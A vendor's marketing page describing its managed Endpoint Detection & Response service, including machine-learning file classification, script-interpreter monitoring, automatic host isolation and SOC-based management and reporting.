EDR stands for Endpoint Detection & Response and is a software-based technology concept, usually based on machine learning/artificial intelligence. The aim is to protect endpoints such as notebooks, PCs and servers from malware - e.g. ransomware, spyware and viruses. To do this, all background processes and activities on the devices are monitored: file executions and modifications, registry changes, network connections and binary executions are scanned as soon as they appear suspicious. If, for example, a connection is established from a supposedly clean Word document to the Internet or even to a known command & control server within a botnet, this is detected by good EDR solutions, alerted or, depending on the setup, prevented directly.
As sophisticated as classic, signature-based anti-malware software is today: It still only works with regard to threats that are already known. Even the next generation anti-virus concepts, which work with differentiated score values and are also better equipped for fileless attacks, are not sufficient for security on the endpoints in the home office. Hackers develop new malicious codes almost every hour, while the current anti-malware tools only detect attacks with a time delay.
Whether on-site at the company or in the home office: Managed EDR detects conspicuous malicious code on your employees' work devices, even if they have not yet been officially recorded as such. Machine Learning is used for this purpose. Artificial intelligence knows the patterns of known viruses and quarantines intruders that resemble these patterns in parts and have therefore been identified as malicious. So-called software agents detect the attackers within the Windows, Linux and macOS operating systems, and also in Virtual Desktop Infrastructures (VDI). The agents are installed locally on the end devices to be protected and retrieve their configuration, any updates, and the latest version of the AI model from the cloud platform.
EDR takes into account numerous properties, such as the size, certain contents (strings), icons, imports used, access permissions, packers used, programming languages, header details or compiler properties. New, unknown files are then compared against this model in real time before they are executed and classified accordingly.
Our solution also detects threats directly in memory, without involving files or disk accesses. For this purpose, the behavior of processes is observed. Scripting languages such as JScript, tools such as PowerShell or macros in Office documents (VBScript) are often used in attacks. Managed EDR identifies malicious or unauthorized behavior by monitoring the respective script interpreter. In the event of anomalies, an alert is issued immediately.
Detecting threats is one thing - acting is another: In the event of malware incidents, Managed EDR triggers automated actions according to your requirements, such as disconnecting the compromised host from the network. However, this does not simply shut down the endpoints, but establishes a secure channel from the server while shutting down all further communication around the device. For any security incident, the faster it is detected and remediated, the less damage it does. Automation therefore efficiently increases your IT security many times over.
| || |
| || |
| || |
| || |
Our solution consists of lean, high-performance agents running on your endpoints and a central, multi-tenant cloud platform operated in Europe. As your IT service provider, we take over the management of endpoint detection & response completely for you in our BSI-certified Security Operation Center (SOC). Among other things, we take care of the configuration as well as regular additions of further system groups and agent policies. You also don't need to worry about regular maintenance: Your end devices are reliably protected against both common known attacks and new types of attacks.
You also benefit from professional reporting on malware detections. Of course, you will be alerted immediately as soon as anything conspicuous happens that is classified as critical by the system. The evaluation is performed by our security experts, who are appropriately trained and can reliably assess whether an incident is relevant. We provide concrete recommendations on how you can further improve the security of your endpoints.